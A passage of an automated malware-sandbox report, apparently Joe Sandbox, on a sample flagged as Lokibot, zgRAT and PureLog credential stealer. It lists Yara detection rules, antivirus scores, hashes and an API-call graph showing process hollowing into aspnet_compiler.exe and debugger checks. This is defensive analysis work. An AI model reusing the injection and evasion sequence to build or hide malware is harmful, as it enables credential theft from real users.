                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                Imagebase:0x70000
                                                File size:309'760 bytes
                                                MD5 hash:F5259113B28AA9CB170D1D4C7003F79F
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 74%, ReversingLabs
                                                • Detection: 40%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:09:29:21
                                                Start date:06/04/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                Imagebase:0x80000
                                                File size:56'368 bytes
                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:4
                                                Start time:09:29:21
                                                Start date:06/04/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                Imagebase:0x550000
                                                File size:56'368 bytes
                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000004.00000002.3494407989.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:moderate
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:15.8%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:3.4%
                                                  Total number of Nodes:88
                                                  Total number of Limit Nodes:3
                                                  execution_graph 5775 70db40 5777 70db94 LoadLibraryA 5775->5777 5778 70dc5b 5777->5778 5711 495d710 5712 495d78e WriteProcessMemory 5711->5712 5713 495d779 5711->5713 5714 495d7f0 5712->5714 5713->5712 5715 495add0 5716 495ae15 FindCloseChangeNotification 5715->5716 5717 495ae60 5716->5717 5718 495d8d0 ResumeThread 5719 495d958 5718->5719 5720 495d5d0 VirtualAllocEx 5721 495d687 5720->5721 5722 495d040 5723 495d0cd CreateProcessW 5722->5723 5725 495d234 5723->5725 5779 6ad01c 5780 6ad034 5779->5780 5781 6ad08f 5780->5781 5783 70e5c0 5780->5783 5784 70e619 5783->5784 5787 70eb98 5784->5787 5785 70e64e 5788 70ebc2 5787->5788 5791 70ed4c 5788->5791 5792 70d9a8 5788->5792 5791->5785 5794 70d9cf 5792->5794 5796 70deb8 5794->5796 5797 70df01 VirtualProtect 5796->5797 5799 70da9f 5797->5799 5799->5785 5800 700848 5801 700854 5800->5801 5802 70085f 5801->5802 5807 701227 5801->5807 5811 70692d 5801->5811 5815 701a8b 5801->5815 5818 70650a 5801->5818 5808 701246 5807->5808 5810 70d9a8 VirtualProtect 5808->5810 5809 70126a 5810->5809 5812 70694c 5811->5812 5814 70d9a8 VirtualProtect 5812->5814 5813 706971 5814->5813 5817 70d9a8 VirtualProtect 5815->5817 5816 7010e2 5817->5816 5820 70d9a8 VirtualProtect 5818->5820 5819 706528 5820->5819 5821 70f0c8 5822 70f10c VirtualAlloc 5821->5822 5824 70f179 5822->5824 5726 49514f8 5727 495151a 5726->5727 5730 4951950 5727->5730 5728 49516b1 5731 495197c 5730->5731 5735 4951a01 5731->5735 5741 4951a10 5731->5741 5732 4951989 5732->5728 5736 4951a10 5735->5736 5737 4951a29 5736->5737 5747 4951b15 5736->5747 5751 4951ede 5736->5751 5755 4951f2d 5736->5755 5737->5732 5742 4951a1d 5741->5742 5743 4951a29 5742->5743 5744 4951b15 CheckRemoteDebuggerPresent 5742->5744 5745 4951f2d EnumWindows 5742->5745 5746 4951ede EnumWindows 5742->5746 5743->5732 5744->5743 5745->5743 5746->5743 5748 4951b29 5747->5748 5749 4951b56 5748->5749 5759 495aca0 5748->5759 5752 4951ee7 5751->5752 5753 4951eff 5752->5753 5763 495b228 5752->5763 5753->5737 5756 4951ee7 5755->5756 5757 4951eff 5755->5757 5756->5757 5758 495b228 EnumWindows 5756->5758 5757->5737 5758->5757 5760 495ace9 CheckRemoteDebuggerPresent 5759->5760 5762 495ad40 5760->5762 5762->5749 5764 495b23d 5763->5764 5767 495b0e0 5764->5767 5768 495b124 EnumWindows 5767->5768 5770 495b18b 5768->5770 5770->5753 5771 495d378 5772 495d3d6 5771->5772 5773 495d3eb Wow64SetThreadContext 5771->5773 5772->5773 5774 495d434 5773->5774

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 110 495aca0-495ad3e CheckRemoteDebuggerPresent 113 495ad47-495ad8b 110->113 114 495ad40-495ad46 110->114 114->113
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0495AD2E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: 3f7d1538fe4ba9c4709e83f5584343c740eed802d6a410ac7087c804ddf0ceda
                                                  • Instruction ID: 62271845398861ad96b2fe4e15332db195415a151c51a3c87dec111b168042da
                                                  • Opcode Fuzzy Hash: 3f7d1538fe4ba9c4709e83f5584343c740eed802d6a410ac7087c804ddf0ceda
                                                  • Instruction Fuzzy Hash: 9531A9B4D012189FDB10DFA9D980A9EFBF5BF49310F20942AE814B7210D775A945CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 24 495d040-495d0cb 25 495d0e2-495d0f0 24->25 26 495d0cd-495d0df 24->26 27 495d107-495d143 25->27 28 495d0f2-495d104 25->28 26->25 29 495d145-495d154 27->29 30 495d157-495d232 CreateProcessW 27->30 28->27 29->30 34 495d234-495d23a 30->34 35 495d23b-495d304 30->35 34->35 44 495d306-495d32f 35->44 45 495d33a-495d345 35->45 44->45
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0495D21F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: d9aca64f9bfd26e12ef583f4e70834db4a492d517211165496a33be93b79e678
                                                  • Instruction ID: 9a3150e386ed9c0b89dfb0194cf6f4d1437b7cefc8d352e2ddda24c8b6ec2339
                                                  • Opcode Fuzzy Hash: d9aca64f9bfd26e12ef583f4e70834db4a492d517211165496a33be93b79e678
                                                  • Instruction Fuzzy Hash: 6781BE74C0022D9FDB25CFA9D880BDDBBF5AB49304F1094AAE548B7220DB74AA85CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 49 70db40-70dba3 51 70dc02-70dc59 LoadLibraryA 49->51 52 70dba5-70dbd2 49->52 55 70dc62-70dca5 51->55 56 70dc5b-70dc61 51->56 52->51 62 70dbd4-70dbd9 52->62 60 70dcb5 55->60 61 70dca7-70dcab 55->61 56->55 61->60 63 70dcad 61->63 64 70dbdb-70dbe5 62->64 65 70dbfc-70dbff 62->65 63->60 66 70dbe7 64->66 67 70dbe9-70dbf8 64->67 65->51 66->67 67->67 68 70dbfa 67->68 68->65
                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?), ref: 0070DC49
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_700000_x.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 444b991527982a27d0cb636477bb46abe1b1f4115976120fa15febcd2280bb62
                                                  • Instruction ID: 8a5aefe22564cad0cb886fb4cc5ff83211cb15f2454a9c106b91fdbd5ec2c8b1
                                                  • Opcode Fuzzy Hash: 444b991527982a27d0cb636477bb46abe1b1f4115976120fa15febcd2280bb62
                                                  • Instruction Fuzzy Hash: 2141F0B4D00358CFEB20CFE9D98579EBBF1BB49304F109129E814AB291D7B89845CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 69 495d710-495d777 70 495d78e-495d7ee WriteProcessMemory 69->70 71 495d779-495d78b 69->71 72 495d7f7-495d835 70->72 73 495d7f0-495d7f6 70->73 71->70 73->72
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0495D7DE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: b68e4e3deefd9f12193e98aee90aee1c331ecc533812896fd0aba8383723d58c
                                                  • Instruction ID: 651215aaf0c470dd34761939f1fe9957ccd2f2ed2774c105885f68493109a7c5
                                                  • Opcode Fuzzy Hash: b68e4e3deefd9f12193e98aee90aee1c331ecc533812896fd0aba8383723d58c
                                                  • Instruction Fuzzy Hash: 524168B9D002599FCF10CFA9D984ADEFBF5BB49310F24902AE918B7210D375AA45CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 76 70deb8-70df6c VirtualProtect 79 70df75-70dfbd 76->79 80 70df6e-70df74 76->80 80->79
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0070DF5C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_700000_x.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 8c3035dfc9256a9899b2bdf3ed97710b81941eefb79ee89aa4be7e09a546a474
                                                  • Instruction ID: 6f84d7c9b3a30e74d6baddc5752871c2b527828357c5006396dd3c74ee77f44e
                                                  • Opcode Fuzzy Hash: 8c3035dfc9256a9899b2bdf3ed97710b81941eefb79ee89aa4be7e09a546a474
                                                  • Instruction Fuzzy Hash: 2E31A8B4D012499FDB10CFA9D980A9EFBB0BB49310F24902AE819B7210D735A945CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 85 495d5d0-495d685 VirtualAllocEx 86 495d687-495d68d 85->86 87 495d68e-495d6c4 85->87 86->87
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0495D675
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 49f1d146d9dddea9985e66473e0e4c4253e1f7283fd1318b063ec58b42968057
                                                  • Instruction ID: 8a727c5a6df25a6e3d9971a85b0964737322f7a4effb712f0cdffbacd10f7421
                                                  • Opcode Fuzzy Hash: 49f1d146d9dddea9985e66473e0e4c4253e1f7283fd1318b063ec58b42968057
                                                  • Instruction Fuzzy Hash: 733156B9D052589FCF10CFA9D984A9EFBB5BB19310F20A02AE818B7310D335A945CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 90 495d378-495d3d4 91 495d3d6-495d3e8 90->91 92 495d3eb-495d432 Wow64SetThreadContext 90->92 91->92 93 495d434-495d43a 92->93 94 495d43b-495d473 92->94 93->94
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 0495D422
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 617d5d3774a33030e655400c5d28e5db801b583e396fcfebfecc3c25481fb162
                                                  • Instruction ID: 1481864bf5f69bec02fb68cafe1637cdcfd23ed95c720ec6012ae096eb5272aa
                                                  • Opcode Fuzzy Hash: 617d5d3774a33030e655400c5d28e5db801b583e396fcfebfecc3c25481fb162
                                                  • Instruction Fuzzy Hash: 573199B5D012589FCB10CFAAD984ADEFBF5BB49314F24902AE818B7350D378A945CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 97 495b0e0-495b133 99 495b135-495b13d 97->99 100 495b140-495b189 EnumWindows 97->100 99->100 103 495b192-495b1de 100->103 104 495b18b-495b191 100->104 104->103
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID: EnumWindows
                                                  • String ID:
                                                  • API String ID: 1129996299-0
                                                  • Opcode ID: e36ed2475ab28edab88bb2211d46b0f82216cc09ced3afd0e05b94bb63ec436c
                                                  • Instruction ID: c5243542a3e2e3fb799970a662fbd41fb22e985206169b0e596eba2d3b2d5bfe
                                                  • Opcode Fuzzy Hash: e36ed2475ab28edab88bb2211d46b0f82216cc09ced3afd0e05b94bb63ec436c
                                                  • Instruction Fuzzy Hash: D031C8B4D0121D9FDB14DFA9D984AEEFBB5BF89310F20942AE805B7210C735A941CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 119 495add0-495ae5e FindCloseChangeNotification 121 495ae67-495ae95 119->121 122 495ae60-495ae66 119->122 122->121
                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0495AE4E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  • Opcode ID: 6d5e1a5297b18bd60981a7f05684f23594f77f0d74d9d8ce3b074c96eb7c7275
                                                  • Instruction ID: 75ff9e3b0eac94ab35420e0ddd14e5dfd99442c2da9af559272f832f3e2e57c3
                                                  • Opcode Fuzzy Hash: 6d5e1a5297b18bd60981a7f05684f23594f77f0d74d9d8ce3b074c96eb7c7275
                                                  • Instruction Fuzzy Hash: 7D219BB4D002189FDF10CFA9E584ADEFBF4AB49310F20902AE818B7310D335A945CFA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 125 495d8d0-495d956 ResumeThread 126 495d95f-495d98d 125->126 127 495d958-495d95e 125->127 127->126
                                                  APIs
                                                  • ResumeThread.KERNELBASE(?), ref: 0495D946
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: c3cc3e1b130938bb48c7b282333a1dbe5570d13420ca8f78f834840856ddf229
                                                  • Instruction ID: 1c4ab7a09fd7acd23b07c769912c5a3e8aba70149c96accdf873e1a63533b4e9
                                                  • Opcode Fuzzy Hash: c3cc3e1b130938bb48c7b282333a1dbe5570d13420ca8f78f834840856ddf229
                                                  • Instruction Fuzzy Hash: 712199B8D002199FCB10CFA9D584ADEFBF4BB49320F24906AE918B7310D375A945CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 166 70f0c8-70f177 VirtualAlloc 169 70f180-70f1c8 166->169 170 70f179-70f17f 166->170 170->169
                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0070F167
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_700000_x.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 93c93bdd447110efe42c004f38d46f4cd04f80af2a1924e7f5c079d53b279125
                                                  • Instruction ID: ca3e0ac20cc0009e9179b285de482ce9cab396c36874f5234bc98e4b5d697075
                                                  • Opcode Fuzzy Hash: 93c93bdd447110efe42c004f38d46f4cd04f80af2a1924e7f5c079d53b279125
                                                  • Instruction Fuzzy Hash: 333198B9D01258DFDF10CFA9D980A9EFBB1BF49310F24942AE814B7210D739A945CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2276979153.00000000006AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_6ad000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2a98a018828f32d88dee648ea2d686a070767912d06288317320eaf885d63b7a
                                                  • Instruction ID: 17550b6810f09d33ed4c66bc58f839e545faddec6324dff0ba83c0642378bf2a
                                                  • Opcode Fuzzy Hash: 2a98a018828f32d88dee648ea2d686a070767912d06288317320eaf885d63b7a
                                                  • Instruction Fuzzy Hash: 02212271104244DFDB10EF14D9C4B26BBA6FB89314F208569E90A4B742C336DC4BCFA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2276979153.00000000006AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_6ad000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8b9c9ddbd0d257bc51137d3d6756a33c49f4bb600b8c15afd20c52d71809a847
                                                  • Instruction ID: aecb73c73c188a09cc5117feb8a5beff174cda5ecbe6d40dd2569f9da469a171
                                                  • Opcode Fuzzy Hash: 8b9c9ddbd0d257bc51137d3d6756a33c49f4bb600b8c15afd20c52d71809a847
                                                  • Instruction Fuzzy Hash: F221F6B1644240EFDB04EF14D980B16BBA6FB85718F20C96DD80A4B791C336DC4BCE61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2276979153.00000000006AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_6ad000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 58b5753ba848c3ee01b20ec167095d01995965029b6d51df78447ec1c65ac814
                                                  • Instruction ID: 1d4dfb63d7788424ff8ef9fe7ec29c9a55bd46a4e4639f66b8c8a882d403a5dc
                                                  • Opcode Fuzzy Hash: 58b5753ba848c3ee01b20ec167095d01995965029b6d51df78447ec1c65ac814
                                                  • Instruction Fuzzy Hash: B02180715083809FCB02DF14D994B56BF72EB86314F2985DAD8458F697C33A9C1ACBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2276979153.00000000006AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_6ad000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 33e330166665ebd0cfd0a235bce6a45b074b869f388cde929a169c887396a6bf
                                                  • Instruction ID: a630722da7b4463960961c5cb9186279c7816c02d56d93941507816d4a4bc137
                                                  • Opcode Fuzzy Hash: 33e330166665ebd0cfd0a235bce6a45b074b869f388cde929a169c887396a6bf
                                                  • Instruction Fuzzy Hash: 68119D755042808FDB05EF10D984B55BBA2FB85318F24CAA9D84A4BB52C33ADC0ACF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_700000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: D@j$\Uj
                                                  • API String ID: 0-3517916542
                                                  • Opcode ID: abf7d00184cee145a88a992ac57d99973adf6fa0fa2052307b2e7c0def248843
                                                  • Instruction ID: ac172e96dd888f016c88cbda49d8b98f313b1a9f628aab3d43dc67f80b84a497
                                                  • Opcode Fuzzy Hash: abf7d00184cee145a88a992ac57d99973adf6fa0fa2052307b2e7c0def248843
                                                  • Instruction Fuzzy Hash: 79612E74A016498FDB48EF7AE88069ABBF7BBC9300F14D52DD0149B369DF7499068F90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_700000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: D@j$\Uj
                                                  • API String ID: 0-3517916542
                                                  • Opcode ID: 8e6af73ecc4dab174d4770da9d9818871a3571b8d5b0246447bc88db1fd3ff80
                                                  • Instruction ID: a2327f92ec9c33e8637b4f2ddb79ba3d28514155c68e979cfa30132544daa0b5
                                                  • Opcode Fuzzy Hash: 8e6af73ecc4dab174d4770da9d9818871a3571b8d5b0246447bc88db1fd3ff80
                                                  • Instruction Fuzzy Hash: CF612E74A012498FDB48EF7AE88069ABBF7BBC9300F14D52DD01497369DF7899068F90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9414118b66c25b5c80ce56b8d44ec0ec3e4c38ee0bb33ac702a3a1b8941aeb2c
                                                  • Instruction ID: f6be8263dcb74d46c1d390bfb0d6b6ebfabbf90263333667ef5181885ee1ba9f
                                                  • Opcode Fuzzy Hash: 9414118b66c25b5c80ce56b8d44ec0ec3e4c38ee0bb33ac702a3a1b8941aeb2c
                                                  • Instruction Fuzzy Hash: 0E610A74A002458FDB58EFAAE891699BBF7FBCA300F14D52DD0049B369DB74A9068F50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4950000_x.jbxd
